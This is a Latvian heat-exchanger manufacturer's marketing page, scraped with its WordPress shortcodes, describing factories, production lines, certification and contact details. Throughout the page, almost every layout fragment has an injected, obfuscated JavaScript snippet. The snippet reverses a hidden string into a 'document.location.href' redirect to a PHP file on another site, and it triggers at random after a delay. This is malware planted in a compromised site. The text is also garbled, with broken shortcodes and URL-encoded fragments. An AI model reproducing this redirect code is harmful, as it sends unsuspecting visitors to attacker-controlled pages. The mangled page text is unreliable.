industry-g2f10068a5_1280
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1564976660254{padding-top: 114px !important;padding-bottom: 56px !important;}”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1564718166806{padding-top: 0px !important;padding-right: 100px !important;padding-left: 100px !important;}”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1564718201654{padding-top: 0px !important;}”]

Sākums

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1564718208866{padding-top: 0px !important;}”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1564971574083{padding-bottom: 85px !important;}”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1567129067827{padding-top: 0px !important;}” offset=”vc_col-lg-4 vc_col-md-4″]

Siltummaiņi tiek ražoti divās mūsdienīgās rūpnīcās, kuru kopējā platība ir vairāk nekā 1800m2. Kopā rūpnīcas sastāv no astoņām, ļoti efektīvām ražošanas līnijām, kurās izmantotas vismodernākās mūsu rūpniecībai pieejamās ražošanas iekārtas. Mūsu pētniecības un attīstības departaments pastāvīgi attīsta produktus, iekārtas un procesus, lai atbilstu pieaugošajām tirgus prasībām. Mūsu gada apgrozījums ir pastāvīgi palielinājies. Esam droši, zinot, ka mūsu pieredze, konkurētspēja, kvalitāte un uzsvars uz izaugsmi ir nodrošinājis mūsu klientu vēlmes un resursu ietaupījumu. Risinājumu nodrošināšana aizvien jauniem klientiem no dažādām nozarēm norāda uz esošo vērtību un kvalitātes atbilstību. Mūsu siltummaiņi ir uzstādīti visā pasaulē dažāda veida un izmēra ražošanas un komerciālos uzņēmumos. Tas aptver gan mazas HVAC sistēmas, gan lielākus un sarežģītākus lietojumus, piemēram, gāzes turbīnu gaisa ieplūdes dzesēšanas sistēmas, jūras un specializētos rūpnieciskos procesus.

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1567129076510{padding-top: 0px !important;padding-right: 26px !important;padding-left: 50px !important;}” offset=”vc_col-lg-5 vc_col-md-5″]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1567129086888{padding-top: 0px !important;padding-left: 54px !important;}” offset=”vc_col-lg-3 vc_col-md-3″]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to%C5%A1ana%20%C4%BCauj%20mums%20sasniegt%20teicamus%20rezult%C4%81tus%20produktu%20ra%C5%BEo%C5%A1an%C4%81%22%7D%2C%7B%22title%22%3A%22Elast%C4%ABgums%22%2C%22content%22%3A%22Elast%C4%ABgums%20ir%20m%C5%ABsu%20sp%C4%93ks.%20M%C4%93s%20sp%C4%93jam%20viegli%20piel%C4%81goties%20projekta%20pras%C4%ABb%C4%81m%20un%20standartiem%2C%20neatkar%C4%ABgi%2C%20cik%20sare%C5%BE%C4%A3%C4%ABts%20ir%20lietojums.%20Sp%C4%93jam%20ra%C5%BEot%20tad%2C%20kad%20tas%20ir%20nepiecie%C5%A1ams%20un%20pieg%C4%81d%C4%81t%20laik%C4%81.%22%7D%2C%7B%22title%22%3A%22Uzticam%C4%ABba%22%2C%22content%22%3A%22M%C5%ABsu%20klienti%20var%20pa%C4%BCauties%20uz%20m%C5%ABsu%20sniegtaj%C4%81m%20atbild%C4%93m%20un%20ieteikumiem.%20R%C5%ABpniec%C4%ABbas%20nozar%C4%93%2C%20kur%20tehniskas%20k%C4%BC%C5%ABdas%20maks%C4%81%20d%C4%81rgi%20ir%20%C4%81rk%C4%81rt%C4%ABgi%20svar%C4%ABgi%20att%C4%ABst%C4%ABt%20sp%C4%93c%C4%ABgas%20uz%20uztic%C4%ABbu%20balst%C4%ABtas%20attiec%C4%ABbas.%22%7D%5D” col_xxl=”4″]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1565925341287{padding-top: 114px !important;padding-bottom: 90px !important;}”]
Rūpnīcas produkcija

Mūsu produkcija

[cms_button button_text=”Individuāla pieeja” button_link=”url:%23|||” button_style=”btn-text” text_before=”Inovatīvi un ilgtspējīgi risinājumi.” align_lg=”align-center” align_md=”align-center-md” align_sm=”align-center-sm” align_xs=”align-center-xs”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1566182764224{background-color: #f9f9f9 !important;}”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1566182739651{padding-top: 114px !important;padding-bottom: 105px !important;}”] ) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tojums%20iek%C4%BCauj%20veikalus%2C%20slimn%C4%ABcas%2C%20graudu%20kaltes%2C%20tekstila%20un%20citas%20r%C5%ABpn%C4%ABcas.%22%7D%2C%7B%22title%22%3A%22Industri%C4%81liem%20procesiem%22%2C%22content%22%3A%22Plastmasas%20ra%C5%BEo%C5%A1an%C4%81%2C%20virsmas%20apstr%C4%81des%20iek%C4%81rt%C4%81s%2C%20kr%C4%81so%C5%A1anas%20kab%C4%ABn%C4%93s%2C%20kr%C4%81sn%C4%ABs%20un%20daudz%20cit%C4%81s%20jom%C4%81s%20un%20procesos.%20M%C4%93s%20sp%C4%93jam%20izv%C4%93l%C4%93ties%20lab%C4%81kos%20materi%C4%81lus%20un%20termodinamisko%20izm%C4%93ru%20siltummai%C5%86iem%2C%20kuri%20nepiecie%C5%A1ami%20da%C5%BE%C4%81tom_1565920999509{padding-top: 0px !important;padding-right: 14% !important;padding-left: 14% !important;background: rgba(255,118,7,0.95) url(https://demo.cmssuperheroes.com/themeforest/industic/wp-content/uploads/2019/08/industic-9-1.jpg?id=378) !important;*background-color: rgb(255,118,7) !important;}" offset="vc_col-lg-6 vc_col-md-6" el_class="col-overlay bg-image-ps-bottom"]
Augstākās kvalitātes risinājumi

Ražošanas tehnoloģija un sertifikācija

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom="22"]

Uzticamību un kvalitāti spējam nodrošināt pateicoties vairāk kā 30 gadu pieredzei un 170 darbinieku lielai komandai. Tikai tie uzņēmumi, kas turpina ieguldīt pētniecībā un attīstībā, saviem klientiem spēj piedāvāt gan reālas tehniskās prasmes, gan izcilu kvalitāti. Mūsu produkti tiek sertificēti visos līmeņos, savukārt, ražošanas tehnoloģijā tiek izmantots vēja tunelis, ražošanas kontroles mehānismi un ERP programmatūra.

) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1565921997271{margin-right: -15px !important;margin-left: -15px !important;}"]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1567216382666{padding-top: 62px !important;padding-right: 15px !important;padding-left: 15px !important;}" animation_column="fadeInUp"]
Produkta sertifikācija
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1567216388709{padding-top: 62px !important;padding-right: 15px !important;padding-left: 15px !important;}" animation_column="fadeInUp"]
Tehniskā sertifikācija
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1567216393825{padding-top: 62px !important;padding-right: 15px !important;padding-left: 15px !important;}" animation_column="fadeInUp"]
Kvalitātes sertifikācija
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1574685934666{padding-top: 0px !important;background-color: rgba(27,26,26,0.05) !important;*background-color: rgb(27,26,26) !important;}" offset="vc_col-lg-6 vc_col-md-6"]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tor%22%3A%22%2C%22%2C%22icon_image%22%3A%22389%22%7D%2C%7B%22title%22%3A%22Darbinieku%20Liela%20komanda%22%2C%22description%22%3A%22kas%20r%C5%ABp%C4%93jas%20par%20ra%C5%BEo%C5%A1anas%2C%20kontroles%20un%20p%C4%81rtom_1565926334756{background-color: rgba(27,26,26,0.65) !important;*background-color: rgb(27,26,26) !important;}"]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1565927881180{padding-top: 114px !important;padding-bottom: 188px !important;}"]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_1565930016214{margin-top: -120px !important;padding-top: 0px !important;padding-bottom: 36px !important;}"]

    ) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton_link="|||" bg_image="412" title="Sazinies ar mums" description="Pilnīga produktu kontrole ļauj mums nodrošināt, ka klienti saņem vislabākās cenas un pakalpojumus. Mēs ļoti lepojamies ar visu, ko mēs darām mūsu rūpnīcā" brochure_title="Stabilitāte un efektivitāte kopā ar BLISPRO" brochure_description="Ražojam siltummaiņus, kuri paredzēti dažādam lietojumam, tostarp gaisa kondicionēšanai, graudu kaltē, elektroenerģijas ražošanai, kuģniecības nozarē, ražošanas procesos un visa veida rūpnīcās."]
    [cms_button button_text="+371 2477 8220" button_link="url:tel%3A%2B37124778220|||" button_style="btn-text-primary" text_before="Mēs ar jums sazināsimies 24 stundu laikā vai zvaniet" align_lg="align-center" align_md="align-center-md" align_sm="align-center-sm" align_xs="align-center-xs"]